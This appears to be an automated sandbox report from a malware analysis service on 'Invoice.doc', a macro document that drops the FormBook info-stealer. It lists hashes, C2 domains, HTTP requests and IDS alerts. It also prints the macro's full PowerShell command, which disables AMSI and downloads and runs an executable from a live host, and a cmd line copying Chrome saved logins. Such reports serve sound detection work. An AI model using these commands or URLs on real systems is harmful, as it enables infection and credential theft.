analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice.doc

Full analysis: https://app.any.run/tasks/27b55ddc-fe30-4d11-942d-220e4e3f9605
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Analysis date: January 11, 2019, 12:25:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
trojan
formbook
stealer
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: y8883, Subject: ua241e, Keywords: The transformative moment in Rumis life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been, says Gooch.c friendship for three years lover and The two of them have this electri beloved [or] disciple and sheikh, its never clear., Comments: Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 10 08:05:00 2019, Last Saved Time/Date: Thu Jan 10 08:05:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

037F9E66DD3B71F4B8FC3A3A52A90C20

SHA1:

0E516072BA747B5F6917971E521F172C18FD5CAC

SHA256:

7715FD65B7A1AFF18214C55C62BF362BC18A4719F20E62D83566DD05CBBF786B

SSDEEP:

384:y8iS8px8SMDO3ENGONQS5Bksdgv38AzmaMOYN0j1otf:a3yEENGO7yZ7MlC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • okyp.exe (PID: 3580)
    • Changes the autorun value in the registry

      • systray.exe (PID: 3232)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2924)
    • FORMBOOK was detected

      • explorer.exe (PID: 116)
    • Formbook was detected

      • systray.exe (PID: 3232)
      • Firefox.exe (PID: 3116)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2924)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3932)
    • Connects to CnC server

      • explorer.exe (PID: 116)
    • Stealing of credential data

      • cmd.exe (PID: 3168)
      • systray.exe (PID: 3232)
    • Loads dropped or rewritten executable

      • systray.exe (PID: 3232)
    • Actions looks like stealing of personal data

      • systray.exe (PID: 3232)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3932)
      • systray.exe (PID: 3232)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3932)
      • systray.exe (PID: 3232)
    • Starts CMD.EXE for commands execution

      • systray.exe (PID: 3232)
    • Loads DLL from Mozilla Firefox

      • systray.exe (PID: 3232)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2924)
      • Firefox.exe (PID: 3116)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2924)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: y8883
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: -
Paragraphs: -
Lines: -
Bytes: 11000
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: -
Words: -
Pages: 1
ModifyDate: 2019:01:10 08:05:00
CreateDate: 2019:01:10 08:05:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L
Keywords: The transformative moment in Rumi’s life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been,” says Gooch.c friendship for three years – lover and The two of them have this electri beloved [or] disciple and sheikh, it’s never clear.
Author: -
Subject: ua241e
Title: y8883
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe okyp.exe no specs #FORMBOOK systray.exe cmd.exe no specs #FORMBOOK explorer.exe #FORMBOOK firefox.exe no specs cmd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2924"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3932"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\okyp.exe') {Remove-Item $env:APPDATA + '\okyp.exe'}; $ZLCTZ = New-Object System.Net.WebClient; $ZLCTZ.Headers['User-Agent'] = 'ZLCTZ'; $ZLCTZ.DownloadFile('http://supportwip.com/sweetmoney/sureboy.exe', $env:APPDATA + '\okyp.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\okyp.exe'); Stop-Process -Id $Pid -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3580"C:\Users\admin\AppData\Roaming\okyp.exe" C:\Users\admin\AppData\Roaming\okyp.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\okyp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3232"C:\Windows\System32\systray.exe"C:\Windows\System32\systray.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Systray .exe stub
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\systray.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
3028/c del "C:\Users\admin\AppData\Roaming\okyp.exe"C:\Windows\System32\cmd.exesystray.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
116C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
3116"C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe
systray.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
61.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
3168/c copy "C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\admin\AppData\Local\Temp\DB1" /VC:\Windows\System32\cmd.exe
systray.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
2 017
Read events
1 607
Write events
405
Delete events
5

Modification events

(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:7!%
Value:
372125006C0B0000010000000000000000000000
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2924) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1311440926
(PID) Process:(2924) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1311441040
(PID) Process:(2924) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1311441041
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
6C0B0000FE8B30DBA8A9D40100000000
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:j#%
Value:
6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:j#%
Value:
6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2924) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
81
Text files
1
Unknown types
4

Dropped files

PID
Process
Filename
Type
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9197.tmp.cvr
MD5:
SHA256:
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MVWRVUGPCJIH10UZQLU.temp
MD5:
SHA256:
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nvoice.docpgc
MD5:4DEEDEE404389A721352098DF5F35B67
SHA256:AC97D48C4EA5C347B68376711FF5676C55B328D740FC33416B84D838145F315D
3232systray.exeC:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrc.inibinary
MD5:2855A82ECDD565B4D957EC2EE05AED26
SHA256:88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3932powershell.exeC:\Users\admin\AppData\Roaming\okyp.exeexecutable
MD5:765DA31F20FE265BFAAD52A8B7783428
SHA256:C2A178F24669726FB79E35B68E57F9511D10D616A9C3E27B359347A7442FB2C0
2924WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:41379A924454D4DBF21EC8153C20C10F
SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80
3932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199d11.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3232systray.exeC:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logim.jpegimage
MD5:B9B7820FC4B4A7688AF78A7C2F0BD2EA
SHA256:5F4608D8DF41D9D8EE46CC8B6D236D80B05FD290BB7059DE84B4AA557724A936
3116Firefox.exeC:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrf.inibinary
MD5:53028481B5B5795F1501241CCC7ABFF6
SHA256:75B5F3045E20C80F264568707E2D444DC7498DB119D9661AE51A91575960FC5A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
26
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
116
explorer.exe
GET
301
91.197.229.178:80
http://www.poludi.com/h338/?mz7xU=Mk4ZEShFqULTsaF0XK/8FqKcCk95UNLNJKoy7u5vPmnqz/wagv5VU4tRNIzD42mKcAUBWw==&Un0=9rj8zR5hUB7LxJ00&sql=1
GB
malicious
116
explorer.exe
GET
154.83.149.29:80
http://www.57maiche.com/h338/?mz7xU=NV1+jEcSAdddK4garX8ku4se6CqspjOpSP+U2OFBm3+R7b+2CsRubuWy/znMrDf+FjB7Wg==&Un0=9rj8zR5hUB7LxJ00
US
malicious
116
explorer.exe
GET
93.89.226.17:80
http://www.magnetaraba.com/h338/?mz7xU=BykNHXwYDJdeDgKR3FWbYQVNXcq2qTzZSeXXVh/qHFW68iISCy7e6kECzKi+UcA0jmuYMQ==&Un0=9rj8zR5hUB7LxJ00&sql=1
CY
malicious
116
explorer.exe
GET
104.217.42.167:80
http://www.yncits60.com/h338/?mz7xU=LTBLM06XJVCFnl6kdmraniVJjDPmmd32bKvcr5K5R/32ggOyVf5i9AouFgef/a5XWJTCRg==&Un0=9rj8zR5hUB7LxJ00&sql=1
US
malicious
3932
powershell.exe
GET
200
91.234.99.161:80
http://supportwip.com/sweetmoney/sureboy.exe
NL
executable
167 Kb
malicious
116
explorer.exe
POST
104.217.42.167:80
http://www.yncits60.com/h338/
US
malicious
116
explorer.exe
POST
91.197.229.178:80
http://www.poludi.com/h338/
GB
malicious
116
explorer.exe
POST
91.197.229.178:80
http://www.poludi.com/h338/
GB
malicious
116
explorer.exe
POST
104.217.42.167:80
http://www.yncits60.com/h338/
US
malicious
116
explorer.exe
POST
93.89.226.17:80
http://www.magnetaraba.com/h338/
CY
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
116
explorer.exe
154.83.149.29:80
www.57maiche.com
MULTACOM CORPORATION
US
malicious
116
explorer.exe
104.217.42.167:80
www.yncits60.com
Psychz Networks
US
malicious
3932
powershell.exe
91.234.99.161:80
supportwip.com
MAROSNET Telecommunication Company LLC
NL
suspicious
116
explorer.exe
91.197.229.178:80
www.poludi.com
Gyron Internet Ltd
GB
malicious
116
explorer.exe
80.237.133.41:80
www.mynuesli.com
Host Europe GmbH
DE
malicious
116
explorer.exe
66.147.244.214:80
www.newtonjiujitsu.com
Unified Layer
US
malicious
116
explorer.exe
93.89.226.17:80
www.magnetaraba.com
Fbs Bilisim Cozumleri Tic Ltd Sti.
CY
malicious
116
explorer.exe
192.64.115.93:80
www.bonzaj.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
supportwip.com
  • 91.234.99.161
malicious
www.57maiche.com
  • 154.83.149.29
malicious
www.poludi.com
  • 91.197.229.178
malicious
www.magnetaraba.com
  • 93.89.226.17
malicious
www.sexeuw.info
unknown
www.yncits60.com
  • 104.217.42.167
malicious
www.newtonjiujitsu.com
  • 66.147.244.214
malicious
www.bangdai898.com
unknown
www.mynuesli.com
  • 80.237.133.41
malicious
www.bonzaj.com
  • 192.64.115.93
malicious

Threats

PID
Process
Class
Message
3932
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
116
explorer.exe
A Network Trojan was detected
SC SPYWARE Trojan-Spy.Win32.Noon
116
explorer.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header
116
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
116
explorer.exe
A Network Trojan was detected
SC SPYWARE Trojan-Spy.Win32.Noon
116
explorer.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header
116
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
116
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
116
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
116
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
20 ETPRO signatures available at the full report
No debug info